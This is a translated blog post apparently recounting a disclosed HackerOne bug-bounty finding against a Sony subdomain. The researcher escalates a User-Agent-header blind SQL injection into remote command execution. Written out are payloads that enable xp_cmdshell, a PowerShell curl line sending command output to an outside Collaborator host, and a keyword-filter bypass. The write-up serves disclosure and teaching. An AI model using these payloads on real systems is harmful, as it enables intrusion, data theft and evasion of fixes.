The topic of information security and data protection is extremely relevant for any business, regardless of its size and geography. As part of our blog, we decided to publish notes from foreign colleagues based on their real experience on the topic. We hope that the above material will be useful to you.
Foreword
In this article, I will talk about my report sent to Sony as part of a public program on the HackerOne website, as well as how I converted Blind Time-based SQL Injection into full-scale remote OS command execution.I will cut out important details from the article such as domains, subdomains, command results, my IP address, server IP address, and others.
Exploration stage
For the exploration stage, I used the sublist3r domain I needed to find subdomains.
I checked all subdomains but the links were dead. Frustrated, I tried other intelligence tools like amass. Surprisingly, the result was better.
Amass found subdomains for me that cannot be seen in simple google requests. (Sorry, but I will not show screenshots). He identified a subdomain of the species special.target.com.
Getting to know Target closer
Going to the site, I saw that it was something like an admin panel or a page for employee login.
Next, I tried the classic symbol ' for checking for sql errors. I entered username=123'&password=123'.
Checked the requests burpsuiteand the endpoint returned me a fruitful 500 error page. Why fruitful? The developers forgot to turn off the debug mode (or something like that), and this allowed me to see the whole request with the full path to the files.
The endpoint is vulnerable to Microsoft SQL Injection.
The exploit itself
I have tried simple boolean SQL injection with a parameter usernamebut with no success. I was getting errors in response to any payload. After re-examining the request error, I realized that my User-Agent Header is being passed to the database. I added one quote and a comment to my user-agent ‘--, and finally got the normal correct page.
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'--
A good sign that the server is executing user-supplied commands. Then I tested time-based SQL injection to see if queries could be pushed onto the stack.
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36';WAITFOR DELAY ‘00:00:05’;--The answer was delayed by about 5 seconds.
This confirms that we can push SQL queries onto the stack and inject whatever commands we need.
Extending SQL Injection to RCE
Since we now know that we can push requests onto the stack, we need to find a way to execute OS commands here. Unlike MySQL, MSSQL has a way to execute commands. I used the information from the article by Prashant Kumar.It xp_cmdshellturned out that you can execute OS commands using, so I enabled on the server xp_cmdshell.
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'; EXEC sp_configure ‘show advanced options’, 1; RECONFIGURE; EXEC sp_configure ‘xp_cmdshell’, 1; RECONFIGURE;--Then I ping tested the Blind RCE feature with the help of
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36'; EXEC xp_cmdshell 'ping myburpcollablink.burpcollaborator.net';--
Fine! Burpsuite Collaborator Client has been accessed. This confirms that we can perform RCE.
Unlike Prashant Kumar, I did not save the results of command execution to the database and created a non-destructive way of reading the results of the OS commands execution.
I assigned the output to a variable in powershell and sent them to my BurpCollaborator using curl.
It works like this:
Code:
powershell -c “$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x”The command gets the execution results whoami and sends them to my burpcollab link
The finished RCE payload looks like this:
Code:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36';EXEC xp_cmdshell ‘powershell -c “$x = whoami; curl http://my-burp-link.burpcollaborator.net/get?output=$x"';--The command results are sent to me.
I was also able to extract metadata information for AWS EC2 instances, view server files, and more.
We bypass the "fix"
A few days later, Sony informed me that they had deployed a patch. I tried to start my old payload, but it was blocked by a firewall. I saw that the company put a keyword in the filter EXEC xp_cmdshell.I bypassed the filter by declaring a variable @x with a value xp_cmdshell and running a command like EXEC @x
Code:
‘; DECLARE @x AS VARCHAR(100)=’xp_cmdshell’; EXEC @x ‘ping k7s3rpqn8ti91kvy0h44pre35ublza.burpcollaborator.net’ —Chronicle of events
- September 14, 2021 → first report sent
- September 16, 2021 → report verified by Hackerone
- September 21, 2021 → the first patch is deployed (I bypassed it)
- September 23, 2021 → another patch deployed (I bypassed it again)
- September 26, 2021 → final patch deployed
- September 27, 2021 → vulnerability marked fixed, bounty paid.
